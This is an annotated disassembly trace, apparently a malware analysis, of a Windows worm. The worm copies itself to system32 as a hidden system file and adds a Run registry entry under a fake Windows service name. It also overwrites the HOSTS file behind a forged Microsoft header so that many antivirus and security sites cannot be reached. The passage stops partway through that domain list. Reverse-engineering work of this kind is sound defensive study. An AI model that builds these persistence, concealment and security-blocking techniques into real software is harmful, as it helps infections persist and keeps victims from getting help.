00402BE6 83C4 0C ADD ESP,0C
00402BE9 68 04010000 PUSH 104
00402BEE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BF4 50 PUSH EAX
00402BF5 6A 00 PUSH 0
00402BF7 FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleA
00402BFD 50 PUSH EAX
00402BFE FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA (get the path of the running executable).
00402C04 68 04010000 PUSH 104
00402C09 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402C0F 50 PUSH EAX
00402C10 FF15 94804000 CALL DWORD PTR DS:[408094] ; kernel32.GetSystemDirectoryA (get the SYSTEM32 directory path).
00402C16 68 1BD7A201 PUSH 1A2D71B
00402C1B 8D8D 8CF8FFFF LEA ECX,DWORD PTR SS:[EBP-774]
00402C21 E8 4A040000 CALL misfotos.00403070 ; string decoder, returns ASCII "waccs.exe"
00402C26 50 PUSH EAX
00402C27 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402C2D 50 PUSH EAX
00402C2E 68 C9276909 PUSH 96927C9
00402C33 8D8D 84F8FFFF LEA ECX,DWORD PTR SS:[EBP-77C]
00402C39 E8 D2030000 CALL misfotos.00403010 ; string decoder, returns ASCII "%s\%s"
00402C3E 50 PUSH EAX
00402C3F 68 04010000 PUSH 104
00402C44 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402C4A 50 PUSH EAX
00402C4B E8 F0430000 CALL misfotos.00407040 ; JMP to msvcrt._snprintf (builds ASCII "C:\WINDOWS\system32\waccs.exe").
00402C50 83C4 14 ADD ESP,14
00402C53 8D8D 84F8FFFF LEA ECX,DWORD PTR SS:[EBP-77C]
00402C59 E8 28F3FFFF CALL misfotos.00401F86 ; wipe the decoded string.
00402C5E 8D8D 8CF8FFFF LEA ECX,DWORD PTR SS:[EBP-774]
00402C64 E8 85F4FFFF CALL misfotos.004020EE ; wipe the decoded string.
00402C69 68 2FD7A201 PUSH 1A2D72F
00402C6E 8D8D 78F8FFFF LEA ECX,DWORD PTR SS:[EBP-788]
00402C74 E8 F7030000 CALL misfotos.00403070 ; string decoder, returns ASCII "waccs.exe"
00402C79 50 PUSH EAX
00402C7A E8 F1140000 CALL misfotos.00404170 ; add the worm's Run entry to the registry (analysed below).
00402C7F 59 POP ECX
00402C80 8D8D 78F8FFFF LEA ECX,DWORD PTR SS:[EBP-788]
00402C86 E8 63F4FFFF CALL misfotos.004020EE ; wipe the decoded string.
00402C8B 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402C91 50 PUSH EAX ; /s2 = "C:\Documents and Settings\Coderui\桌面\virus.exe" (own path)
00402C92 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402C98 50 PUSH EAX ; |s1 = "C:\WINDOWS\system32\waccs.exe" (install path)
00402C99 E8 04440000 CALL misfotos.004070A2 ; JMP to msvcrt.strcmp (string compare)
00402C9E 59 POP ECX
00402C9F 59 POP ECX
00402CA0 85C0 TEST EAX,EAX ; test the result.
00402CA2 74 70 JE SHORT misfotos.00402D14 ; s1 != s2 (not installed yet): fall through to the install path; s1 == s2 (already running as waccs.exe): jump to the main payload at 00402D14.
00402CA4 83A5 A8F8FFFF 0>AND DWORD PTR SS:[EBP-758],0 ; install path starts here: retry counter = 0.
00402CAB EB 0D JMP SHORT misfotos.00402CBA
00402CAD 8B85 A8F8FFFF MOV EAX,DWORD PTR SS:[EBP-758]
00402CB3 40 INC EAX
00402CB4 8985 A8F8FFFF MOV DWORD PTR SS:[EBP-758],EAX
00402CBA 83BD A8F8FFFF 0>CMP DWORD PTR SS:[EBP-758],5 ; give up after 5 failed copies.
00402CC1 7D 1E JGE SHORT misfotos.00402CE1
00402CC3 6A 00 PUSH 0 ; /FailIfExists = FALSE
00402CC5 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402CCB 50 PUSH EAX ; |NewFileName = "C:\WINDOWS\system32\waccs.exe"
00402CCC 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402CD2 50 PUSH EAX ; |ExistingFileName = "C:\Documents and Settings\Coderui\桌面\virus.exe"
00402CD3 FF15 90804000 CALL DWORD PTR DS:[408090] ; kernel32.CopyFileA
00402CD9 85C0 TEST EAX,EAX ; check the result.
00402CDB 74 02 JE SHORT misfotos.00402CDF ; copy failed: jump to 00402CDF and retry; copy succeeded: fall through.
00402CDD EB 02 JMP SHORT misfotos.00402CE1 ; copy succeeded: continue at 00402CE1.
00402CDF ^ EB CC JMP SHORT misfotos.00402CAD ; back to 00402CAD: bump the counter and copy again.
00402CE1 6A 07 PUSH 7
00402CE3 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754] ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00402CE9 50 PUSH EAX ; |FileName = "C:\WINDOWS\system32\waccs.exe"
00402CEA FF15 8C804000 CALL DWORD PTR DS:[40808C] ; kernel32.SetFileAttributesA (mark the dropped copy READONLY|HIDDEN|SYSTEM).
00402CF0 6A 00 PUSH 0
00402CF2 6A 00 PUSH 0
00402CF4 6A 00 PUSH 0
00402CF6 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402CFC 50 PUSH EAX ; FileName = "C:\WINDOWS\system32\waccs.exe"
00402CFD 68 C4914000 PUSH misfotos.004091C4 ; ASCII "open"
00402D02 6A 00 PUSH 0
00402D04 FF15 74814000 CALL DWORD PTR DS:[408174] ; SHELL32.ShellExecuteA (launch the dropped copy waccs.exe).
00402D0A E8 61060000 CALL misfotos.00403370 ; rewrite the HOSTS file with entries for a long list of security-vendor domains so they cannot be reached (analysed below).
00402D0F E8 F9120000 CALL misfotos.0040400D ; the installer exits and deletes its original file.
00402D14 FF15 88804000 CALL DWORD PTR DS:[408088] ; ntdll.RtlGetLastWin32Error (the main payload starts here when s1 == s2).
----------------------------------------------------------
Adding the Run entry in the registry:
00404170 55 PUSH EBP
00404171 8BEC MOV EBP,ESP
00404173 81EC 8C000000 SUB ESP,8C
00404179 6A 00 PUSH 0 ; lpdwDisposition = NULL
0040417B 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
0040417E 50 PUSH EAX ; phkResult
0040417F 6A 00 PUSH 0 ; lpSecurityAttributes = NULL
00404181 68 3F000F00 PUSH 0F003F ; samDesired = KEY_ALL_ACCESS
00404186 6A 00 PUSH 0 ; dwOptions
00404188 6A 00 PUSH 0 ; lpClass
0040418A 6A 00 PUSH 0 ; Reserved
0040418C 68 CAFEBB29 PUSH 29BBFECA
00404191 8D4D CC LEA ECX,DWORD PTR SS:[EBP-34]
00404194 E8 4C060000 CALL misfotos.004047E5 ; string decoder, returns ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
00404199 50 PUSH EAX ; lpSubKey = "Software\Microsoft\Windows\CurrentVersion\Run"
0040419A 68 02000080 PUSH 80000002 ; hKey = HKEY_LOCAL_MACHINE
0040419F FF15 08804000 CALL DWORD PTR DS:[408008] ; ADVAPI32.RegCreateKeyExA
004041A5 8D4D CC LEA ECX,DWORD PTR SS:[EBP-34]
004041A8 E8 08010000 CALL misfotos.004042B5 ; wipe the decoded string.
004041AD 837D 08 00 CMP DWORD PTR SS:[EBP+8],0 ; NULL argument: delete the value instead of setting it (not taken on the install path).
004041B1 74 32 JE SHORT misfotos.004041E5
004041B3 FF75 08 PUSH DWORD PTR SS:[EBP+8] ; String = "waccs.exe"
004041B6 FF15 D8804000 CALL DWORD PTR DS:[4080D8] ; kernel32.lstrlenA
004041BC 50 PUSH EAX ; cbData = lstrlen("waccs.exe")
004041BD FF75 08 PUSH DWORD PTR SS:[EBP+8] ; lpData = "waccs.exe" (bare file name, no path)
004041C0 6A 01 PUSH 1 ; dwType = REG_SZ
004041C2 6A 00 PUSH 0 ; Reserved
004041C4 68 4E9127A1 PUSH A127914E
004041C9 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]
004041CC E8 74060000 CALL misfotos.00404845 ; string decoder, returns ASCII "Windows Activation Control Center Service"
004041D1 50 PUSH EAX ; lpValueName = "Windows Activation Control Center Service"
004041D2 FF75 FC PUSH DWORD PTR SS:[EBP-4] ; hKey
004041D5 FF15 04804000 CALL DWORD PTR DS:[408004] ; ADVAPI32.RegSetValueExA
004041DB 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]
004041DE E8 FA000000 CALL misfotos.004042DD ; wipe the decoded string.
004041E3 EB 25 JMP SHORT misfotos.0040420A
004041E5 68 7A9127A1 PUSH A127917A
004041EA 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C]
004041F0 E8 50060000 CALL misfotos.00404845 ; same string decoder as at 004041CC (the decoded value name is not shown in this trace).
004041F5 50 PUSH EAX ; lpValueName
004041F6 FF75 FC PUSH DWORD PTR SS:[EBP-4] ; hKey
004041F9 FF15 00804000 CALL DWORD PTR DS:[408000] ; ADVAPI32.RegDeleteValueA
004041FF 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C]
00404205 E8 D3000000 CALL misfotos.004042DD ; wipe the decoded string.
0040420A FF75 FC PUSH DWORD PTR SS:[EBP-4]
0040420D FF15 18804000 CALL DWORD PTR DS:[408018] ; ADVAPI32.RegCloseKey
00404213 C9 LEAVE
00404214 C3 RETN ; return.


Rewriting the HOSTS file with entries for a long list of security-vendor domains so they cannot be reached:
00403370 55 PUSH EBP
00403371 8BEC MOV EBP,ESP
00403373 81EC E0030000 SUB ESP,3E0
00403379 68 04010000 PUSH 104
0040337E 6A 00 PUSH 0
00403380 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
00403386 50 PUSH EAX
00403387 E8 AE3C0000 CALL misfotos.0040703A ; JMP to msvcrt.memset
0040338C 83C4 0C ADD ESP,0C
0040338F 68 04010000 PUSH 104
00403394 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
0040339A 50 PUSH EAX
0040339B FF15 94804000 CALL DWORD PTR DS:[408094] ; kernel32.GetSystemDirectoryA (get the SYSTEM32 directory path).
004033A1 68 04010000 PUSH 104
004033A6 68 E6430183 PUSH 830143E6
004033AB 8D8D A0FCFFFF LEA ECX,DWORD PTR SS:[EBP-360]
004033B1 E8 4F0F0000 CALL misfotos.00404305 ; string decoder, returns ASCII "\drivers\etc\hosts"
004033B6 50 PUSH EAX ; ASCII "\drivers\etc\hosts"
004033B7 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
004033BD 50 PUSH EAX ; ASCII "C:\WINDOWS\system32"
004033BE E8 6B3C0000 CALL misfotos.0040702E ; JMP to msvcrt.strncat (builds ASCII "C:\WINDOWS\system32\drivers\etc\hosts").
004033C3 83C4 0C ADD ESP,0C
004033C6 8D8D A0FCFFFF LEA ECX,DWORD PTR SS:[EBP-360]
004033CC E8 C5EAFFFF CALL misfotos.00401E96 ; wipe the decoded string.
004033D1 68 38924000 PUSH misfotos.00409238 ; /mode = "w"
004033D6 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
004033DC 50 PUSH EAX ; |path = "C:\WINDOWS\system32\drivers\etc\hosts"
004033DD E8 D83C0000 CALL misfotos.004070BA ; JMP to msvcrt.fopen (mode "w" truncates HOSTS: the existing contents are replaced, not appended to).
004033E2 59 POP ECX
004033E3 59 POP ECX
004033E4 8985 B8FDFFFF MOV DWORD PTR SS:[EBP-248],EAX
004033EA 83BD B8FDFFFF 0>CMP DWORD PTR SS:[EBP-248],0
004033F1 75 07 JNZ SHORT misfotos.004033FA
004033F3 32C0 XOR AL,AL ; fopen failed: return FALSE.
004033F5 E9 18060000 JMP misfotos.00403A12
004033FA 68 AF305D14 PUSH 145D30AF
004033FF 8D8D 70FCFFFF LEA ECX,DWORD PTR SS:[EBP-390]
00403405 E8 5B0F0000 CALL misfotos.00404365 ; string decoder, returns ASCII "# Copyright (c) 1993-1999 Microsoft Corp.\n#\n"
0040340A 50 PUSH EAX ; /format = "# Copyright (c) 1993-1999 Microsoft Corp.\n#\n"
0040340B FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248] ; |stream = msvcrt.77C2FCE0
00403411 E8 9E3C0000 CALL misfotos.004070B4 ; JMP to msvcrt.fprintf (writes a header that mimics the genuine file)
00403416 59 POP ECX
00403417 59 POP ECX
00403418 8D8D 70FCFFFF LEA ECX,DWORD PTR SS:[EBP-390]
0040341E E8 F20D0000 CALL misfotos.00404215 ; wipe the decoded string.
00403423 68 981A4325 PUSH 25431A98
00403428 8D8D 20FCFFFF LEA ECX,DWORD PTR SS:[EBP-3E0]
0040342E E8 920F0000 CALL misfotos.004043C5 ; string decoder, returns ASCII "# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows.\n#\n\n"
00403433 50 PUSH EAX ; /format = "# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows.\n#\n\n"
00403434 FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248] ; |stream = msvcrt.77C2FCE0
0040343A E8 753C0000 CALL misfotos.004070B4 ; JMP to msvcrt.fprintf
0040343F 59 POP ECX
00403440 59 POP ECX
00403441 8D8D 20FCFFFF LEA ECX,DWORD PTR SS:[EBP-3E0]
00403447 E8 F10D0000 CALL misfotos.0040423D ; wipe the decoded string.

Next the function fills a stack array with pointers to the domain strings that will be written out, one pointer per MOV. (Some of OllyDbg's string previews below run several adjacent domains together; each MOV still stores the pointer to one domain.)
0040344C C785 C0FDFFFF B>MOV DWORD PTR SS:[EBP-240],misfotos.0040>; merijn.org
00403456 C785 C4FDFFFF C>MOV DWORD PTR SS:[EBP-23C],misfotos.0040>; www.merijn.org
00403460 C785 C8FDFFFF D>MOV DWORD PTR SS:[EBP-238],misfotos.0040>; www.spywareinfo.comspywareinfo.c ... fowww.viruslist.com
0040346A C785 CCFDFFFF E>MOV DWORD PTR SS:[EBP-234],misfotos.0040>; spywareinfo.comwww.spybot.infospybot.infowww.viruslist.com
00403474 C785 D0FDFFFF F>MOV DWORD PTR SS:[EBP-230],misfotos.0040>; www.spybot.infospybot.infowww.viruslist.com
0040347E C785 D4FDFFFF 0>MOV DWORD PTR SS:[EBP-22C],misfotos.0040>; spybot.infowww.viruslist.com
00403488 C785 D8FDFFFF 1>MOV DWORD PTR SS:[EBP-228],misfotos.0040>; www.viruslist.com
00403492 C785 DCFDFFFF 2>MOV DWORD PTR SS:[EBP-224],misfotos.0040>; viruslist.com
0040349C C785 E0FDFFFF 3>MOV DWORD PTR SS:[EBP-220],misfotos.0040>; www.hijackthis.de
004034A6 C785 E4FDFFFF 5>MOV DWORD PTR SS:[EBP-21C],misfotos.0040>; hijackthis.de
004034B0 C785 E8FDFFFF 6>MOV DWORD PTR SS:[EBP-218],misfotos.0040>; www.majorgeeks.com
004034BA C785 ECFDFFFF 7>MOV DWORD PTR SS:[EBP-214],misfotos.0040>; majorgeeks.com
004034C4 C785 F0FDFFFF 8>MOV DWORD PTR SS:[EBP-210],misfotos.0040>; www.virustotal.com
004034CE C785 F4FDFFFF 9>MOV DWORD PTR SS:[EBP-20C],misfotos.0040>; virustotal.com
004034D8 C785 F8FDFFFF A>MOV DWORD PTR SS:[EBP-208],misfotos.0040>; kaspersky.com
004034E2 C785 FCFDFFFF B>MOV DWORD PTR SS:[EBP-204],misfotos.0040>; kaspersky-labs.com
004034EC C785 00FEFFFF C>MOV DWORD PTR SS:[EBP-200],misfotos.0040>; www.kaspersky.com
004034F6 C785 04FEFFFF E>MOV DWORD PTR SS:[EBP-1FC],misfotos.0040>; www.sophos.com
00403500 C785 08FEFFFF F>MOV DWORD PTR SS:[EBP-1F8],misfotos.0040>; sophos
0040350A C785 0CFEFFFF F>MOV DWORD PTR SS:[EBP-1F4],misfotos.0040>; securityresponse.symantec.com
00403514 C785 10FEFFFF 1>MOV DWORD PTR SS:[EBP-1F0],misfotos.0040>; symantec.com
0040351E C785 14FEFFFF 2>MOV DWORD PTR SS:[EBP-1EC],misfotos.0040>; www.symantec.com
00403528 C785 18FEFFFF 3>MOV DWORD PTR SS:[EBP-1E8],misfotos.0040>; updates.symantec.com
00403532 C785 1CFEFFFF 5>MOV DWORD PTR SS:[EBP-1E4],misfotos.0040>; liveupdate.symantecliveupdate.com
0040353C C785 20FEFFFF 7>MOV DWORD PTR SS:[EBP-1E0],misfotos.0040>; liveupdate.symantec.comcustomer.symantec.com
00403546 C785 24FEFFFF 9>MOV DWORD PTR SS:[EBP-1DC],misfotos.0040>; customer.symantec.com
00403550 C785 28FEFFFF A>MOV DWORD PTR SS:[EBP-1D8],misfotos.0040>; update.symantec.comwww.mcafee.com
0040355A C785 2CFEFFFF B>MOV DWORD PTR SS:[EBP-1D4],misfotos.0040>; www.mcafee.com
00403564 C785 30FEFFFF C>MOV DWORD PTR SS:[EBP-1D0],misfotos.0040>; mcafee.com
0040356E C785 34FEFFFF D>MOV DWORD PTR SS:[EBP-1CC],misfotos.0040>; rads.mcafee.commast.mcafee.comdownload.mcafee.comdispatch.mcafee.comus.mcafee.com
00403578 C785 38FEFFFF E>MOV DWORD PTR SS:[EBP-1C8],misfotos.0040>; mast.mcafee.comdownload.mcafee.comdispatch.mcafee.comus.mcafee.com
00403582 C785 3CFEFFFF F>MOV DWORD PTR SS:[EBP-1C4],misfotos.0040>; download.mcafee.comdispatch.mcafee.comus.mcafee.com
0040358C C785 40FEFFFF 0>MOV DWORD PTR SS:[EBP-1C0],misfotos.0040>; dispatch.mcafee.comus.mcafee.com
00403596 C785 44FEFFFF 2>MOV DWORD PTR SS:[EBP-1BC],misfotos.0040>; us.mcafee.com
004035A0 C785 48FEFFFF 3>MOV DWORD PTR SS:[EBP-1B8],misfotos.0040>; www.trendsecure.comtrendsecure.c ... seclab.tuwien.ac.at
004035AA C785 4CFEFFFF 4>MOV DWORD PTR SS:[EBP-1B4],misfotos.0040>; trendsecure.comwww.avp.comavp.comanalysis.seclab.tuwien.ac.at
004035B4 C785 50FEFFFF 5>MOV DWORD PTR SS:[EBP-1B0],misfotos.0040>; www.avp.comavp.comanalysis.seclab.tuwien.ac.at
004035BE C785 54FEFFFF 6>MOV DWORD PTR SS:[EBP-1AC],misfotos.0040>; avp.comanalysis.seclab.tuwien.ac.at
004035C8 C785 58FEFFFF 6>MOV DWORD PTR SS:[EBP-1A8],misfotos.0040>; analysis.seclab.tuwien.ac.at
004035D2 C785 5CFEFFFF 8>MOV DWORD PTR SS:[EBP-1A4],misfotos.0040>; www.bleepingcomputer.com
004035DC C785 60FEFFFF A>MOV DWORD PTR SS:[EBP-1A0],misfotos.0040>; bleepingcomputer.com
004035E6 C785 64FEFFFF B>MOV DWORD PTR SS:[EBP-19C],misfotos.0040>; guru0.grisoft.cz
004035F0 C785 68FEFFFF D>MOV DWORD PTR SS:[EBP-198],misfotos.0040>; guru1.grisoft.cz
004035FA C785 6CFEFFFF E>MOV DWORD PTR SS:[EBP-194],misfotos.0040>; guru2.grisoft.cz
00403604 C785 70FEFFFF F>MOV DWORD PTR SS:[EBP-190],misfotos.0040>; guru3.grisoft.cz
0040360E C785 74FEFFFF 0>MOV DWORD PTR SS:[EBP-18C],misfotos.0040>; guru4.grisoft.cz
00403618 C785 78FEFFFF 2>MOV DWORD PTR SS:[EBP-188],misfotos.0040>; guru5.grisoft.cz
00403622 C785 7CFEFFFF 3>MOV DWORD PTR SS:[EBP-184],misfotos.0040>; download.f-secure.com
0040362C C785 80FEFFFF 4>MOV DWORD PTR SS:[EBP-180],misfotos.0040>; www.download.f-secure.com
00403636 C785 84FEFFFF 6>MOV DWORD PTR SS:[EBP-17C],misfotos.0040>; avg-antivirus.net
00403640 C785 88FEFFFF 7>MOV DWORD PTR SS:[EBP-178],misfotos.0040>; www.avg-antivirus.net
0040364A C785 8CFEFFFF 9>MOV DWORD PTR SS:[EBP-174],misfotos.0040>; f-secure.com
00403654 C785 90FEFFFF A>MOV DWORD PTR SS:[EBP-170],misfotos.0040>; www.f-secure.com
0040365E C785 94FEFFFF B>MOV DWORD PTR SS:[EBP-16C],misfotos.0040>; free.grisoft.com
00403668 C785 98FEFFFF C>MOV DWORD PTR SS:[EBP-168],misfotos.0040>; www.free.grisoft.com
00403672 C785 9CFEFFFF E>MOV DWORD PTR SS:[EBP-164],misfotos.0040>; free.avg.com
0040367C C785 A0FEFFFF F>MOV DWORD PTR SS:[EBP-160],misfotos.0040>; www.free.avg.com
00403686 C785 A4FEFFFF 0>MOV DWORD PTR SS:[EBP-15C],misfotos.0040>; avast.com
00403690 C785 A8FEFFFF 1>MOV DWORD PTR SS:[EBP-158],misfotos.0040>; www.avast.com
0040369A C785 ACFEFFFF 2>MOV DWORD PTR SS:[EBP-154],misfotos.0040>; onlinescan.avast.com
004036A4 C785 B0FEFFFF 3>MOV DWORD PTR SS:[EBP-150],misfotos.0040>; www.onlinescan.avast.com
004036AE C785 B4FEFFFF 5>MOV DWORD PTR SS:[EBP-14C],misfotos.0040>; housecall.trendmicro.com
004036B8 C785 B8FEFFFF 7>MOV DWORD PTR SS:[EBP-148],misfotos.0040>; www.housecall.trendmicro.com
004036C2 C785 BCFEFFFF 9>MOV DWORD PTR SS:[EBP-144],misfotos.0040>; free.avg.com
004036CC C785 C0FEFFFF A>MOV DWORD PTR SS:[EBP-140],misfotos.0040>; www.free.avg.com
004036D6 C785 C4FEFFFF B>MOV DWORD PTR SS:[EBP-13C],misfotos.0040>; bitdefender.comwww.bitdefender.comtrendsecure.comwww.trendsecure.comfuturenow.bitdefender.com
004036E0 C785 C8FEFFFF C>MOV DWORD PTR SS:[EBP-138],misfotos.0040>; www.bitdefender.comtrendsecure.c ... now.bitdefender.com
004036EA C785 CCFEFFFF D>MOV DWORD PTR SS:[EBP-134],misfotos.0040>; trendsecure.comwww.trendsecure.comfuturenow.bitdefender.com
004036F4 C785 D0FEFFFF E>MOV DWORD PTR SS:[EBP-130],misfotos.0040>; www.trendsecure.comfuturenow.bitdefender.com
004036FE C785 D4FEFFFF 0>MOV DWORD PTR SS:[EBP-12C],misfotos.0040>; futurenow.bitdefender.com
00403708 C785 D8FEFFFF 1>MOV DWORD PTR SS:[EBP-128],misfotos.0040>; www.futurenow.bitdefender.com
00403712 C785 DCFEFFFF 3>MOV DWORD PTR SS:[EBP-124],misfotos.0040>; f-prot.com
0040371C C785 E0FEFFFF 4>MOV DWORD PTR SS:[EBP-120],misfotos.0040>; www.f-prot.com
00403726 C785 E4FEFFFF 5>MOV DWORD PTR SS:[EBP-11C],misfotos.0040>; eset.com
00403730 C785 E8FEFFFF 6>MOV DWORD PTR SS:[EBP-118],misfotos.0040>; www.eset.com
0040373A C785 ECFEFFFF 7>MOV DWORD PTR SS:[EBP-114],misfotos.0040>; free-av.comwww.free-av.comavira.com
00403744 C785 F0FEFFFF 8>MOV DWORD PTR SS:[EBP-110],misfotos.0040>; www.free-av.comavira.com
0040374E C785 F4FEFFFF 9>MOV DWORD PTR SS:[EBP-10C],misfotos.0040>; avira.com
00403758 C785 F8FEFFFF 9>MOV DWORD PTR SS:[EBP-108],misfotos.0040>; www.avira.com
00403762 C785 FCFEFFFF A>MOV DWORD PTR SS:[EBP-104],misfotos.0040>; free.avg.com
0040376C C785 00FFFFFF B>MOV DWORD PTR SS:[EBP-100],misfotos.0040>; www.free.avg.com
00403776 C785 04FFFFFF D>MOV DWORD PTR SS:[EBP-FC],misfotos.00409>; antivir.es
00403780 C785 08FFFFFF D>MOV DWORD PTR SS:[EBP-F8],misfotos.00409>; www.antivir.es
0040378A C785 0CFFFFFF E>MOV DWORD PTR SS:[EBP-F4],misfotos.00409>; ikarus.net
00403794 C785 10FFFFFF F>MOV DWORD PTR SS:[EBP-F0],misfotos.00409>; www.ikarus.net
0040379E C785 14FFFFFF 0>MOV DWORD PTR SS:[EBP-EC],misfotos.00409>; prevx.com
004037A8 C785 18FFFFFF 1>MOV DWORD PTR SS:[EBP-E8],misfotos.00409>; www.prevx.com
004037B2 C785 1CFFFFFF 2>MOV DWORD PTR SS:[EBP-E4],misfotos.00409>; 2-spyware.com
004037BC C785 20FFFFFF 3>MOV DWORD PTR SS:[EBP-E0],misfotos.00409>; www.2-spyware.com
004037C6 C785 24FFFFFF 4>MOV DWORD PTR SS:[EBP-DC],misfotos.00409>; castlecops.com
004037D0 C785 28FFFFFF 5>MOV DWORD PTR SS:[EBP-D8],misfotos.00409>; www.castlecops.com
004037DA C785 2CFFFFFF 6>MOV DWORD PTR SS:[EBP-D4],misfotos.00409>; virusinfo.prevx.comwww.virusinfo.prevx.comforums.majorgeeks.com
004037E4 C785 30FFFFFF 8>MOV DWORD PTR SS:[EBP-D0],misfotos.00409>; www.virusinfo.prevx.comforums.majorgeeks.com
004037EE C785 34FFFFFF 9>MOV DWORD PTR SS:[EBP-CC],misfotos.00409>; forums.majorgeeks.com
004037F8 C785 38FFFFFF B>MOV DWORD PTR SS:[EBP-C8],misfotos.00409>; www.forums.majorgeeks.com
00403802 C785 3CFFFFFF C>MOV DWORD PTR SS:[EBP-C4],misfotos.00409>; eradicatespyware.net
0040380C C785 40FFFFFF E>MOV DWORD PTR SS:[EBP-C0],misfotos.00409>; www.eradicatespyware.net
00403816 C785 44FFFFFF 0>MOV DWORD PTR SS:[EBP-BC],misfotos.00409>; fortinet.com
00403820 C785 48FFFFFF 1>MOV DWORD PTR SS:[EBP-B8],misfotos.00409>; www.fortinet.com
0040382A C785 4CFFFFFF 2>MOV DWORD PTR SS:[EBP-B4],misfotos.00409>; fortiguardcenter.com
00403834 C785 50FFFFFF 3>MOV DWORD PTR SS:[EBP-B0],misfotos.00409>; www.fortiguardcenter.com
0040383E C785 54FFFFFF 5>MOV DWORD PTR SS:[EBP-AC],misfotos.00409>; trendmicro.com
00403848 C785 58FFFFFF 6>MOV DWORD PTR SS:[EBP-A8],misfotos.00409>; www.trendmicro.com
00403852 C785 5CFFFFFF 7>MOV DWORD PTR SS:[EBP-A4],misfotos.00409>; www.safer-networking.org
0040385C C785 60FFFFFF 9>MOV DWORD PTR SS:[EBP-A0],misfotos.00409>; safer-networking.org
00403866 C785 64FFFFFF B>MOV DWORD PTR SS:[EBP-9C],misfotos.00409>; auditmypc.com
00403870 C785 68FFFFFF C>MOV DWORD PTR SS:[EBP-98],misfotos.00409>; www.auditmypc.com
0040387A C785 6CFFFFFF D>MOV DWORD PTR SS:[EBP-94],misfotos.00409>; pctools.comwww.pctools.comfirewallguide.com
00403884 C785 70FFFFFF E>MOV DWORD PTR SS:[EBP-90],misfotos.00409>; www.pctools.comfirewallguide.com
0040388E C785 74FFFFFF F>MOV DWORD PTR SS:[EBP-8C],misfotos.00409>; firewallguide.com
00403898 C785 78FFFFFF 0>MOV DWORD PTR SS:[EBP-88],misfotos.00409>; www.firewallguide.com
004038A2 C785 7CFFFFFF 1>MOV DWORD PTR SS:[EBP-84],misfotos.00409>; spywaredb.com
004038AC C745 80 2C9B400>MOV DWORD PTR SS:[EBP-80],misfotos.00409>; www.spywaredb.com
004038B3 C745 84 409B400>MOV DWORD PTR SS:[EBP-7C],misfotos.00409>; virusspy.com
004038BA C745 88 509B400>MOV DWORD PTR SS:[EBP-78],misfotos.00409>; www.virusspy.com
004038C1 C745 8C 649B400>MOV DWORD PTR SS:[EBP-74],misfotos.00409>; eradicatespyware.net
004038C8 C745 90 7C9B400>MOV DWORD PTR SS:[EBP-70],misfotos.00409>; www.eradicatespyware.net
004038CF C745 94 989B400>MOV DWORD PTR SS:[EBP-6C],misfotos.00409>; spywareterminator.com
004038D6 C745 98 B09B400>MOV DWORD PTR SS:[EBP-68],misfotos.00409>